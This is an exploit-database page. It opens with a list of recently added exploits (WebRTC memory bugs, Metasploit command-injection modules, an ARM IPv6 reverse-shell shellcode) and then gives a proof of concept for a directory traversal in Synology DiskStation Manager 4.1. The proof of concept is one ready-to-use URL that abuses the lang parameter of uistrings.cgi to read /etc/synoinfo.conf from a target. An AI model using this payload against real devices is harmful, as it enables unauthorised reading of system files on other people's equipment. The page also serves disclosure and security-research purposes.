
10 changes to exploits/shellcodes ipPulse 1.92 - 'Licence Key' Denial of Service (PoC) Switch Port Mapping Tool 2.81 - 'SNMP Community Name' Denial of Service (PoC) WebRTC - VP8 Block Decoding Use-After-Free WebRTC - FEC Processing Overflow WebRTC - H264 NAL Packet Processing Type Confusion Allok MOV Converter 4.6.1217 - Buffer Overflow (SEH) Axis Network Camera - .srv to parhand RCE (Metasploit) SonicWall Global Management System - XMLRPC set_time_zone Command Injection (Metasploit) Synology DiskStation Manager 4.1 - Directory Traversal Linux/ARM - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (116 Bytes)
13 lines
No EOL
465 B
Text
13 lines
No EOL
465 B
Text
# Exploit Title: Synology DiskStation Manager 4.1 - Directory Traversal
|
|
# Google Dork: N/A
|
|
# Date: 2018-07-21
|
|
# Exploit Author: Berk Dusunur
|
|
# Vendor Homepage: https://www.synology.com
|
|
# Software Link: https://www.synology.com
|
|
# Version: v4.1
|
|
# Tested on: Parrot OS
|
|
# CVE : N/A
|
|
|
|
# PoC
|
|
|
|
http://target:8888/scripts/uistrings.cgi?lang=.////////////////////////////////////////////////////////////////////////////////////////../../../../../etc/synoinfo.conf |